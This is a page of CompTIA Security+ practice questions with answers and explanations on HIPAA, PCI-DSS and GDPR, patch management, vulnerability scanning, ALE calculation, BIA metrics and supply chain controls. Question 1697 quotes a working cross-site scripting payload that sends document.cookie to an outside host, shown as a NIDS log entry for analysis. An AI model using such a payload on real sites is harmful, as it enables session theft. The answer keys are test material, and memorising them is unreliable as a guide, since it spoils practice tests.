Tüm alıştırma soruları

2232 soru

Soru 1681Soru

A regional hospital system in the United States is revising its security procedures for storing and transmitting electronic patient medical records. Which of the following laws specifically mandates the privacy and security standards required for Protected Health Information (PHI)?

Cevabı ve açıklamayı göster

Cevap: Health Insurance Portability and Accountability Act (HIPAA)

Cevap

Health Insurance Portability and Accountability Act (HIPAA)
The Health Insurance Portability and Accountability Act (HIPAA) is the primary US federal law establishing standards to protect sensitive patient health information from unauthorized disclosure or misuse.

Adım Adım Çözüm

1
Identify the data classification and jurisdiction in the scenario
The scenario involves patient medical records (PHI) within a US-based healthcare institution.
Compliance frameworks are defined by their specific regulatory scope and regional applicability.
2
Match the data type to its mandatory regulatory framework
HIPAA is the federal law establishing national standards for protecting electronic PHI.
Other regulations cover payment processing (PCI-DSS), corporate financial reporting (SOX), or EU personal data privacy (GDPR).

Anahtar Kavram

Regulatory scope and compliance requirements for Protected Health Information
Soru 1682Soru

A security operations team is establishing a standardized patch management workflow to ensure system security while minimizing operational disruption across the enterprise. Place the steps of the enterprise patch management lifecycle in the correct procedural sequence from initial identification to post-implementation audit.

Öğeleri doğru sıraya koymak için sürükleyin

Cevabı ve açıklamayı göster

Cevap

The correct procedural sequence for the patch management lifecycle is: (1) Analyze vulnerability intelligence feeds and prioritize missing vendor updates based on asset criticality; (2) Apply and evaluate the updates within a non-production staging environment to verify system stability and application compatibility; (3) Submit a formal change request to the Change Advisory Board (CAB) including deployment risk assessments and rollback plans; (4) Execute a phased rollout of the updates across production systems during authorized maintenance windows; and (5) Perform automated security baseline auditing and vulnerability scanning to confirm successful remediation and drift prevention.
The standard patch management lifecycle follows a structured progression: vulnerability identification and prioritization must occur first, followed by pre-deployment testing in staging to ensure stability. Once validated, formal approval from the Change Advisory Board (CAB) is sought with a documented rollback plan. Production deployment is then executed in a phased manner during scheduled maintenance windows, ending with post-patch auditing and baseline verification to confirm vulnerability remediation.

Adım Adım Çözüm

1
Identify and prioritize patch requirements
Assets requiring updates are cataloged according to vulnerability severity and business impact.
Security operations must first assess incoming threats and asset inventory to prioritize remediation efforts effectively.
2
Conduct staging and compatibility testing
Updates are tested in an environment duplicating production configuration without risking live operations.
Pre-deployment testing identifies application dependencies, performance impacts, or instabilities caused by the patch.
3
Obtain Change Advisory Board approval
Change request is reviewed, scheduled, and authorized with explicit rollback procedures established.
Enterprise governance requires documented change authorization to minimize unannounced maintenance outages.
4
Deploy to production systems
Patches are distributed to live environments using staged, canary, or phased maintenance windows.
Phased execution limits blast radius and ensures controlled delivery across operational infrastructure.
5
Validate posture and configuration baselines
Vulnerability scans confirm patch application and ensure configuration baselines have not drifted.
Verification confirms patch success and prevents posture regression or configuration drift.

Anahtar Kavram

Enterprise Patch Management Lifecycle
Soru 1683Soru

A security engineer is planning a vulnerability assessment for an enterprise network segment containing legacy operational technology (OT) devices. These endpoints are highly sensitive to network traffic volume and frequently crash when subjected to active service probing or rapid port sweeps. The engineer must obtain a detailed inventory of missing security patches and system misconfigurations without causing service outages or operational downtime. Which of the following approaches should the engineer implement?

Cevabı ve açıklamayı göster

Cevap: Deploy host-based scanning agents on the target endpoints to gather internal patch and configuration data locally.

Cevap

Deploying host-based scanning agents on the target endpoints to gather internal patch and configuration data locally.
Host-based vulnerability scanning agents run directly on the target operating system to inventory missing security patches, software versions, and local misconfigurations internally. Because agents gather data via local system calls rather than sending network probes across the wire, they eliminate the risk of network traffic spikes or port scan probes crashing fragile legacy OT systems.

Adım Adım Çözüm

1
Analyze system constraints and environmental risks.
Identified legacy OT devices sensitive to network traffic spikes and active port probes.
Active network scanning can trigger stack overflows or service failures on legacy embedded devices.
2
Evaluate vulnerability scanning methodologies.
Host-based agent scanning executes locally on the operating system using minimal native resources.
Local agent data collection eliminates active network probes, meeting both visibility and stability requirements.
3
Select the optimal scanning approach.
Host-based agent deployment provides comprehensive patch and config audit without network impact.
Agents collect detailed local system state safely without overwhelming fragile network interfaces.

Anahtar Kavram

Agent-Based vs. Network-Based Vulnerability Scanning
Tahmini Süre:1m 30s
Soru 1684Soru

A retail business operating in the European Union accepts online credit card payments from local customers. The security team must update company policies to maintain compliance when handling customer payment card details and personal billing addresses. Which of the following compliance frameworks directly govern the security and privacy of these data types? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: Payment Card Industry Data Security Standard (PCI-DSS) for protecting payment cardholder data; General Data Protection Regulation (GDPR) for safeguarding personal data of individuals in the EU

Cevap

The Payment Card Industry Data Security Standard (PCI-DSS) and the General Data Protection Regulation (GDPR) are the two compliance frameworks that directly apply to credit card processing and EU customer personal billing data.
The Payment Card Industry Data Security Standard (PCI-DSS) sets security controls for handling credit card numbers and payment data. The General Data Protection Regulation (GDPR) enforces privacy and data protection rights for personal data collected from individuals in the European Union.

Adım Adım Çözüm

1
Identify the specific data types processed in the scenario
The scenario includes primary credit card numbers (cardholder data) and customer names/billing addresses (EU resident personal data).
Determining applicable compliance standards requires analyzing data classification and subject location.
2
Match data classifications to their governing regulations
PCI-DSS enforces security controls on cardholder data, while GDPR governs privacy controls for EU personal data.
Each compliance framework has specific jurisdiction and scope boundaries based on data type and geographic region.

Anahtar Kavram

Identifying regulatory scope based on data classification (Cardholder Data vs. PII) to apply appropriate compliance frameworks such as PCI-DSS and GDPR.
Tahmini Süre:45s
Soru 1685Soru

An enterprise data center hosts a critical database server with an estimated Asset Value (AVAV) of $300,000\$300,000. Historical threat data indicates that power surge events occur once every 4 years (ARO=0.25\text{ARO} = 0.25), with each unmitigated event carrying an Exposure Factor (EF\text{EF}) of 30%30\%. To mitigate this risk, the organization installs an industrial surge protection system that reduces the Exposure Factor to 5%5\%, without altering the frequency of occurrence. What is the new Annualized Loss Expectancy (ALE\text{ALE}), in dollars, after implementing this control?

Cevabı ve açıklamayı göster

Cevap: 3750

Cevap

The post-mitigation Annualized Loss Expectancy (ALE) is $3,750.
The post-mitigation Annualized Loss Expectancy (ALE\text{ALE}) is computed using the formula ALE=AV×EF×ARO\text{ALE} = \text{AV} \times \text{EF} \times \text{ARO}. Substituting the updated Exposure Factor of 5%5\% (0.050.05) gives a Single Loss Expectancy (SLE\text{SLE}) of $300,000×0.05=$15,000\$300,000 \times 0.05 = \$15,000. Multiplying by the Annualized Rate of Occurrence of 0.250.25 results in an updated ALE\text{ALE} of $15,000×0.25=$3,750\$15,000 \times 0.25 = \$3,750.

Adım Adım Çözüm

1
Calculate post-mitigation Single Loss Expectancy (SLE)
SLE = 300,0000.05=300,000 * 0.05 = 15,000
SLE represents the monetary loss of a single incident, determined by multiplying the Asset Value ($300,000) by the post-mitigation Exposure Factor (5%).
2
Calculate post-mitigation Annualized Loss Expectancy (ALE)
ALE = 15,0000.25=15,000 * 0.25 = 3,750
ALE measures the expected annual monetary loss, calculated by multiplying the post-mitigation SLE by the Annualized Rate of Occurrence (0.25).

Anahtar Kavram

Quantitative Risk Analysis (Post-Mitigation ALE)
Soru 1686Soru

A security operations manager is updating operational procedures for vulnerability assessments across an enterprise network. Match each assessment methodology with the scenario where it is most appropriately applied.

Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın

Öğeler

Credentialed Vulnerability Scan
Non-Credentialed Vulnerability Scan
Passive Network Assessment
Intrusive Penetration Testing

Eşleşmeler

Cevabı ve açıklamayı göster

Cevap

Credentialed vulnerability scanning matches host internal auditing for missing patches. Non-credentialed scanning matches external adversary perspective mapping. Passive network assessment matches non-disruptive device identification on sensitive operational technology networks. Intrusive testing matches active exploitation of vulnerabilities to verify real-world impact.
Each matching pair correctly aligns the specific vulnerability scanning or testing technique with its primary use case: Credentialed scans provide deep host visibility; Non-credentialed scans simulate external attack surfaces; Passive assessments safeguard fragile SCADA/ICS environments; and Intrusive penetration testing validates exploitation potential.

Adım Adım Çözüm

1
Analyze each operational requirement to determine authentication, network impact, and safety constraints.
Identify that host patch audits require host privileges, external reconnaissance requires unauthenticated probes, sensitive legacy OT requires zero injected traffic, and impact validation requires active exploitation.
Vulnerability assessment techniques vary primarily by authorization level (credentialed vs unauthenticated), traffic interaction (active vs passive), and operational risk (intrusive vs non-intrusive).
2
Pair credentialed and non-credentialed techniques with host-based and perimeter-based scenarios respectively.
Assign credentialed scan to host configuration/patch audits, and non-credentialed scan to perimeter service mapping.
Credentials allow host registry and package manager queries, whereas non-credentialed scans rely strictly on network service responses.
3
Distinguish between passive network monitoring and intrusive penetration testing based on target sensitivity and operational goal.
Assign passive assessment to fragile ICS/SCADA networks and intrusive testing to staging environment exploitation.
Passive tools capture existing packet streams safely without causing denial of service on fragile devices, while intrusive tools actively attempt exploitation.

Anahtar Kavram

Vulnerability Assessment Methodologies and Selection Criteria
Soru 1687Soru

An enterprise security analyst discovers that routine software vendor patches regularly overwrite customized security hardening settings on production Linux servers, resetting critical system configurations to insecure defaults. Which of the following patch and configuration management solutions best prevents configuration drift while ensuring ongoing security baseline compliance after patch deployment?

Cevabı ve açıklamayı göster

Cevap: Deploying an automated configuration management tool with scheduled enforcement playbooks

Cevap

Deploying an automated configuration management tool with scheduled enforcement playbooks
Automated configuration management platforms utilize infrastructure code or playbooks to continuously audit system configurations and automatically re-enforce security baselines whenever a patch or administrator alters setting parameters.

Adım Adım Çözüm

1
Analyze the technical problem
Vendor software patches overwrite local system hardening settings, creating security non-compliance and configuration drift.
Security hardening baselines must be maintained continuously without interrupting legitimate software updates.
2
Evaluate remediation strategies
Declarative automated configuration management continuously validates host configurations against defined security baselines.
Automated enforcement playbooks ensure system settings automatically revert to the baseline immediately following patch installations.

Anahtar Kavram

Configuration Baseline Enforcement and Drift Remediation
Tahmini Süre:1m 15s
Soru 1688Soru

An organization's security team is conducting a Business Impact Analysis (BIA) to establish operational recovery requirements for a customer portal database. Which of the following statements accurately describe the metrics used in this analysis? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: Recovery Time Objective (RTO) defines the maximum acceptable duration of time that a system can remain offline following a disruption.; Recovery Point Objective (RPO) determines the maximum tolerable age of data that can be lost during an outage to set backup frequency.

Cevap

The statement defining Recovery Time Objective (RTO) as the maximum acceptable duration a system can remain offline and the statement defining Recovery Point Objective (RPO) as the maximum tolerable age of data loss determining backup frequency are both correct.
Recovery Time Objective (RTO) targets system availability by setting the maximum acceptable duration a system can stay offline. Recovery Point Objective (RPO) targets data protection by setting the maximum acceptable timeframe of lost transactions or data, directly governing backup frequencies.

Adım Adım Çözüm

1
Evaluate the definition and purpose of Recovery Time Objective (RTO).
RTO measures recovery speed and establishes the maximum allowable downtime for a business application or system.
RTO provides operational targets for system restoration schedules after an outage.
2
Evaluate the definition and purpose of Recovery Point Objective (RPO).
RPO measures data loss tolerance measured backward in time from the moment of disruption.
Establishing RPO dictates how frequently data backups must be performed to meet maximum data loss tolerances.

Anahtar Kavram

Distinguishing Recovery Time Objective (RTO) and Recovery Point Objective (RPO) metrics during Business Impact Analysis (BIA)
Soru 1689Soru

An enterprise financial organization is auditing its software vendors' supply chain risk management practices. The security team needs to verify code integrity and ensure compromised third-party open-source dependencies are identified before being integrated into internal build pipelines. Which of the following technical controls or artifacts should the organization require vendors to provide? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: A comprehensive Software Bill of Materials (SBOM) identifying all third-party libraries and dependency versions; Cryptographically signed code attestations and digital signatures for all software packages and release binaries

Cevap

The organization should require a Software Bill of Materials (SBOM) and cryptographically signed code attestations.
Requiring a Software Bill of Materials (SBOM) allows organizations to maintain complete visibility into nested third-party dependencies and quickly evaluate them against known vulnerability databases. Pairing this with cryptographically signed code attestations ensures that binaries and packages have not been altered or tampered with by unauthorized parties during build or transit.

Adım Adım Çözüm

1
Analyze the scenario requirements
The requirement is to verify software code integrity and identify compromised third-party dependencies in software supply chains.
Technical supply chain security requires inventory visibility into components and verification of code authenticity.
2
Evaluate technical supply chain controls
A Software Bill of Materials (SBOM) details all software components and versions, while cryptographically signed attestations verify provenance and integrity.
These controls directly address dependency vulnerability tracking and tamper detection.
3
Differentiate governance and network controls
Legal agreements (NDA, SLA) and network perimeter tests do not inspect code or verify component integrity.
Applying legal or network-level controls is ineffective for verifying software code supply chain integrity.

Anahtar Kavram

Supply Chain Security Verification and Software Provenance
Soru 1690Soru

An organization is updating its enterprise access control policy to comply with strict security standards. Match each operational security task to the corresponding AAA (Authentication, Authorization, and Accounting) or Identification function it represents.

Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın

Öğeler

A network access server validates a user's digital certificate and smart card PIN against the central identity provider during domain logon.
A database gateway checks an enterprise role matrix to permit read-only query execution on financial records.
A centralized syslog server records administrative session timestamps, executed PowerShell commands, and egress data volume.
A web portal prompts an incoming visitor to enter their unique username before initiating any credentials verification.

Eşleşmeler

Cevabı ve açıklamayı göster

Cevap

Task 1 maps to Authentication; Task 2 maps to Authorization; Task 3 maps to Accounting; Task 4 maps to Identification.
Each task directly corresponds to a fundamental identity and AAA principle: entering a username claims an identity (Identification); checking certificates and PINs verifies that claim (Authentication); evaluating role-based query permissions determines access rights (Authorization); and recording command execution and timestamps provides accountability and auditability (Accounting).

Adım Adım Çözüm

1
Analyze Task 1
The process of verifying proof of identity (smart card PIN and certificate) corresponds to Authentication.
Authentication is the verification of a claimed identity using credentials.
2
Analyze Task 2
Determining what actions or data access a verified identity is allowed to perform corresponds to Authorization.
Authorization enforces access control permissions and privilege limitations.
3
Analyze Task 3
Logging actions, command usage, and session metrics for auditability corresponds to Accounting.
Accounting focuses on tracking resource utilization and maintaining audit trails.
4
Analyze Task 4
Providing a unique identifier (username) to claim an identity corresponds to Identification.
Identification is the initial statement of who a user or system claims to be.

Anahtar Kavram

Core Pillars of Identification, Authentication, Authorization, and Accounting (AAA)
Soru 1691Soru

An enterprise organization is procuring core networking hardware from an external supplier to deploy in a high-security data center. The security team wants to prevent threat actors from intercepting the physical shipment to install malicious microcode or physical implants during transit. Which supply chain security control should the organization mandate to address this specific risk?

Cevabı ve açıklamayı göster

Cevap: Mandate hardware provenance tracking using tamper-evident packaging and verified physical chain-of-custody attestations.

Cevap

Mandating hardware provenance tracking using tamper-evident packaging and verified physical chain-of-custody attestations is the correct supply chain control.
Establishing physical chain of custody along with tamper-evident seals ensures that any unauthorized opening, inspection, or modification of hardware during shipment is detectable prior to deployment.

Adım Adım Çözüm

1
Analyze the threat context in the scenario.
The risk involves physical interdiction, microcode tampering, or hardware implant insertion during the transit of physical equipment from supplier to customer.
Identifying the specific threat vector guides the selection of targeted supply chain security controls.
2
Evaluate potential supply chain controls against physical transit tampering.
Chain-of-custody logs ensure end-to-end accountability of handlers, while tamper-evident packaging provides visual and physical verification that shipments have not been compromised en route.
Effective supply chain oversight relies on verifiable physical and cryptographical controls at each logistics step.
3
Differentiate correct supply chain protections from non-applicable administrative or continuity agreements.
Administrative contracts such as NDAs, software escrow, and service provider SOC audit reports address confidentiality, business continuity, and operational governance rather than hardware transit security.
Controls must match the specific operational domain and failure mode described.

Anahtar Kavram

Supply Chain Hardware Oversight and Provenance
Tahmini Süre:1m 15s
Soru 1692Soru

Following an assessment of remote access risks, a network administrator mandates that all system administrators must use hardware security keys to perform multi-factor authentication when logging into administrative portals. Which of the following combinations correctly identifies the control category and functional control type of the hardware security keys?

Cevabı ve açıklamayı göster

Cevap: Technical control executed as a preventive functional type

Cevap

Technical control executed as a preventive functional type
Hardware security keys are technical (logical) controls because they rely on hardware and cryptographic software mechanisms to verify identity. They function as a preventive control type because they block unauthorized access to systems before an intruder can gain entry.

Adım Adım Çözüm

1
Determine the control category by evaluating how the control is implemented.
Hardware security keys rely on technology, cryptography, and automated software/hardware enforcement rather than administrative policies or human operational procedures, classifying them as a Technical control.
Technical controls (also known as logical controls) use hardware, software, or firmware mechanisms to enforce security rules.
2
Determine the functional control type by analyzing the objective of the mechanism.
Multi-factor authentication via hardware security keys stops unauthorized users from gaining access to administrative portals before any unauthorized access occurs, classifying it as a Preventive control type.
Preventive controls aim to deter or prevent security incidents from happening.

Anahtar Kavram

Security Control Categories and Functional Types
Tahmini Süre:1m 0s
Soru 1693Soru

An organization is enhancing its vendor governance framework to address distinct third-party operational and supply chain security risks. Match each risk assessment artifact or agreement on the left to its corresponding enterprise application on the right.

Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın

Öğeler

Vendor Security Questionnaire (e.g., SIG / CAIQ)
Software Bill of Materials (SBOM)
SOC 2 Type II Report
Interconnection Security Agreement (ISA)

Eşleşmeler

Cevabı ve açıklamayı göster

Cevap

Vendor Security Questionnaires pair with gathering self-reported baseline control information; Software Bill of Materials (SBOM) pairs with identifying nested open-source software supply chain vulnerabilities; SOC 2 Type II Reports pair with evaluating operational control effectiveness over an extended monitoring period; Interconnection Security Agreements (ISAs) pair with defining technical security parameters for direct network connections.
Each vendor oversight tool fulfills a unique governance function: Vendor Security Questionnaires provide preliminary self-attested control baselines; SBOMs grant visibility into third-party software component supply chains; SOC 2 Type II reports offer independent audit evidence of operational control performance over time; and ISAs define technical security requirements for dedicated system-to-system interconnections.

Adım Adım Çözüm

1
Analyze the purpose of initial vendor intake self-assessments.
Map Vendor Security Questionnaire to gathering self-reported baseline control posture during vendor intake.
Standardized questionnaires collect foundational information directly from the vendor prior to formal independent verification.
2
Evaluate software supply chain visibility tools.
Link Software Bill of Materials (SBOM) to component-level vulnerability analysis and nested library inventorying.
An SBOM explicitly details code ingredients, allowing organizations to trace downstream exposure to upstream software package vulnerabilities.
3
Distinguish independent third-party audit report scope based on operational duration.
Associate SOC 2 Type II Report with evaluating operational control effectiveness over an extended period.
Unlike Type I reports which only attest to design at a single point in time, Type II reports verify that controls operated effectively over time.
4
Differentiate inter-organizational network connectivity governance.
Connect Interconnection Security Agreement (ISA) to establishing technical security requirements for direct network links.
An ISA specifies technical and security parameters governing dedicated network interconnections between separate entities.

Anahtar Kavram

Third-Party Risk Assessment Artifacts and Inter-Organizational Security Agreements
Soru 1694Soru

A lead security architect is designing an automated archival service for high-throughput system audit logs stored at rest. The security policy mandates strong bulk data confidentiality and authenticated integrity while minimizing computational latency for multi-gigabyte log archives. Which of the following cryptographic mechanisms best fulfills these requirements?

Cevabı ve açıklamayı göster

Cevap: Advanced Encryption Standard (AES) operating in Galois/Counter Mode (GCM)

Cevap

Advanced Encryption Standard (AES) operating in Galois/Counter Mode (GCM) is the correct choice because symmetric ciphers deliver high-speed bulk data encryption, and GCM mode provides authenticated encryption for confidentiality and integrity.
AES in Galois/Counter Mode (GCM) is a symmetric cipher providing authenticated encryption (AEAD). It delivers high-speed confidentiality for large file volumes along with built-in integrity checking.

Adım Adım Çözüm

1
Analyze the core operational security requirements.
The requirement specifies bulk data encryption at rest requiring confidentiality, high throughput (low latency), and authenticated integrity.
Bulk storage encryption requires symmetric algorithms because asymmetric algorithms are too slow for large files.
2
Evaluate symmetric cipher modes against asymmetric and hashing primitives.
AES is a symmetric block cipher capable of high-performance bulk processing. Galois/Counter Mode (GCM) adds authenticated encryption (AEAD) to verify data integrity alongside confidentiality.
AES-GCM satisfies both confidentiality and integrity requirements with hardware acceleration on modern processors.

Anahtar Kavram

Symmetric vs. Asymmetric Encryption and Authenticated Cipher Modes
Tahmini Süre:1m 30s
Soru 1695Soru

A global pharmaceutical corporation established an executive directive requiring all public-facing services to enforce robust transport layer security. To support this requirement, system administrators need specific, step-by-step operational instructions for configuring web server software to disable legacy protocols and enable approved cipher suites. Which of the following governance document types should the operations team create to fulfill this requirement?

Cevabı ve açıklamayı göster

Cevap: Procedure

Cevap

Procedure
A procedure is a mandatory document that provides explicit, sequential, step-by-step instructions to carry out operational tasks and maintain compliance with technical standards.

Adım Adım Çözüm

1
Analyze the scenario requirements
Identified the need for step-by-step, operational commands and tasks for system administrators.
Governance documents serve distinct roles based on whether they set goals, define technical specifications, give recommendations, or outline implementation steps.
2
Map the requirement to the security governance document hierarchy
High-level goals correspond to Policies, specific requirements correspond to Standards, advisory suggestions correspond to Guidelines, and sequential implementation tasks correspond to Procedures.
Procedures are operational, mandatory documents detailing the exact sequence of steps to perform a technical task.

Anahtar Kavram

Security Policy Hierarchy (Policies vs. Standards vs. Procedures vs. Guidelines)
Tahmini Süre:1m 15s
Soru 1696Soru

Match each business continuity and Business Impact Analysis (BIA) metric with its corresponding operational definition.

Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın

Öğeler

Recovery Time Objective (RTO)
Recovery Point Objective (RPO)
Maximum Tolerable Downtime (MTD)
Mean Time Between Failures (MTBF)

Eşleşmeler

Cevabı ve açıklamayı göster

Cevap

Recovery Time Objective (RTO) corresponds to the target restoration timeframe; Recovery Point Objective (RPO) corresponds to the maximum acceptable data loss timeframe; Maximum Tolerable Downtime (MTD) corresponds to the absolute maximum outage duration before irreparable harm; Mean Time Between Failures (MTBF) corresponds to the expected operational reliability between failures.
Each business continuity metric aligns directly with its primary focus area: Recovery Time Objective (RTO) focuses on restoration duration, Recovery Point Objective (RPO) focuses on data loss windows, Maximum Tolerable Downtime (MTD) sets the upper threshold for business survival, and Mean Time Between Failures (MTBF) quantifies hardware reliability.

Adım Adım Çözüm

1
Identify the data loss boundary metric
Recovery Point Objective (RPO) defines maximum acceptable data loss measured backwards in time from the moment of disruption.
RPO focuses strictly on transactional and data retention loss windows.
2
Identify the targeted service restoration metric
Recovery Time Objective (RTO) represents the targeted goal duration for recovering systems.
RTO measures recovery effort time from interruption to operational readiness.
3
Identify the business limit threshold metric
Maximum Tolerable Downtime (MTD) specifies the maximum survival threshold of system downtime.
Exceeding MTD results in catastrophic operational loss.
4
Identify the equipment reliability metric
Mean Time Between Failures (MTBF) tracks average system availability between breakdowns.
MTBF measures overall component and system reliability over time.

Anahtar Kavram

Business Impact Analysis Metrics (RTO, RPO, MTD, MTBF)
Tahmini Süre:1m 0s
Soru 1697Soru

While analyzing alerts from a network intrusion detection system (NIDS) monitoring outbound perimeter traffic, a security administrator notices an alert flagged as a high-severity SQL injection payload against an enterprise web application server. The packet log payload reads:

`GET /comment.php?id=101&data=<script>document.location='http://192.0.2.55/collect?cookie='+document.cookie</script> HTTP/1.1`

Which of the following represents the most accurate evaluation of this network alert?

Cevabı ve açıklamayı göster

Cevap: The NIDS signature misclassified the alert; the packet payload indicates a Cross-Site Scripting (XSS) attack vector rather than a SQL injection attempt.

Cevap

The NIDS alert mislabeled the attack signature; the logged payload represents a Cross-Site Scripting (XSS) attack designed for client-side script execution, not a SQL injection database attack.
Analyzing the raw payload string reveals `<script>` tags designed to extract `document.cookie` and send it to an external server (`192.0.2.55`). This is a classic Cross-Site Scripting (XSS) payload intended for execution in a web browser. The NIDS alert mislabeled the threat as SQL injection, highlighting the need for analysts to manually inspect payload logs.

Adım Adım Çözüm

1
Inspect the captured network log payload for key indicators
Identified HTML `<script>` tags and `document.cookie` DOM references in the HTTP GET request.
Script tags and DOM manipulation elements indicate client-side script execution typical of XSS.
2
Distinguish between XSS and SQL injection attack signatures
Determined that SQL injection relies on database syntax (such as `UNION`, `SELECT`, `OR 1=1`), which is absent here.
Signature evaluation requires recognizing the target interpreter (web browser client vs SQL database server).
3
Assess NIDS alert classification accuracy
Concluded that the alert generated by the NIDS was a misclassified rule trigger.
NIDS signature definitions can misfire or apply generic labels, requiring analyst payload inspection for accurate categorization.

Anahtar Kavram

Log Payload Analysis & NIDS Alert Validation
Soru 1698Soru

A Security Operations Center (SOC) receives an automated alert generated by a Network Intrusion Prevention System (NIPS) detecting an remote code execution (RCE) payload targeted at an internal API server. In what chronological sequence should a security analyst perform the initial response actions from alert ingestion through recovery?

Öğeleri doğru sıraya koymak için sürükleyin

Cevabı ve açıklamayı göster

Cevap

The correct operational sequence is: 1) Initial NIPS detection and alert generation, 2) SIEM log correlation and alert verification, 3) Host isolation for network containment, 4) Deep PCAP and forensic artifact investigation, and 5) Vulnerability patching and system restoration.
In standard network security operations, alert handling follows a structured sequence: Detection (NIPS alert), Identification/Correlation (SIEM log verification), Containment (host isolation), Forensics/Analysis (PCAP and artifact review), and Eradication/Recovery (patching and system restoration).

Adım Adım Çözüm

1
Identify the alert trigger
The NIPS flags suspicious inbound API traffic and generates a security event.
Security monitoring systems must first capture anomalies and alert security personnel.
2
Triage and correlate logs
SIEM correlation confirms a true positive event targeting an active API endpoint.
Analysts must validate alerts against contextual log data to rule out false positives.
3
Execute containment
The target API server is segmented/isolated from the corporate network.
Preventing lateral movement takes operational precedence over deep technical investigation.
4
Perform forensic investigation
PCAP analysis and host memory extraction reveal scope and indicators of compromise.
Forensic data capture determines whether payload execution was successful and what data was accessed.
5
Eradicate and restore
The application flaw is remediated and the host is restored safely to service.
Remediation prevents re-infection upon bringing systems back online.

Anahtar Kavram

Network Alert Triage and Incident Response Lifecycle
Soru 1699Soru

A healthcare organization specifies that its critical Electronic Health Record (EHR) database cannot be offline for longer than four hours in total before severe operational disruption and patient care risks occur. Which of the following business continuity metrics represents this total maximum allowable outage timeframe?

Cevabı ve açıklamayı göster

Cevap: Maximum Tolerable Downtime (MTD)

Cevap

Maximum Tolerable Downtime (MTD)
Maximum Tolerable Downtime (MTD) represents the absolute upper limit of time a business function or IT system can be down before the enterprise suffers unacceptable or irreversible operational damage.

Adım Adım Çözüm

1
Identify the key requirement in the scenario
The organization needs to define the absolute maximum threshold of time a system can be down before catastrophic impact occurs (4 hours).
Business Impact Analysis establishes upper boundaries for allowable downtime to protect essential functions.
2
Map the requirement to the appropriate BIA metric
Maximum Tolerable Downtime (MTD) is the metric defining the maximum threshold of overall outage time.
MTD represents the maximum outage time an enterprise can survive before experiencing fatal disruption.

Anahtar Kavram

Maximum Tolerable Downtime (MTD)
Soru 1700Soru

A security team is experiencing severe performance degradation on production database servers whenever network-based vulnerability scans occur. The team must maintain comprehensive vulnerability visibility while eliminating operational disruption to high-traffic database services. Which of the following strategies should the security team implement to resolve this issue? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: Configure scan rate limits and throttle packet transmission speeds on the vulnerability scanner targeting production database subnets.; Deploy host-based vulnerability scanning agents on the database servers to collect local security metadata directly.

Cevap

The security team should configure scan rate limits on network scanners and deploy host-based scanning agents on database servers.
Configuring scan rate limiting reduces the frequency and density of network probes sent to production systems, preventing socket exhaustion and high CPU spikes. Concurrently, deploying host-based agents allows local inventory and vulnerability evaluation without relying on heavy network-based probing, achieving low-overhead auditing.

Adım Adım Çözüm

1
Analyze the operational issue causing database performance degradation.
Aggressive network port sweeps and concurrent connection attempts overload production host sockets and CPU resources.
Identifying the root cause distinguishes network scanning load from local database processing overhead.
2
Evaluate remediation techniques that reduce scan impact while maintaining visibility.
Throttling scanner packet rates prevents network flooding, and host-based agents run efficiently as background OS processes without network-intensive probing.
Combining rate limiting and agent-based auditing provides thorough vulnerability coverage without interrupting service availability.

Anahtar Kavram

Vulnerability Scanner Performance Optimization and Agent vs. Network-based Scanning
ÖncekiSayfa 85 / 112Sonraki
Tüm alıştırma soruları — CompTIA Security+ | Examkin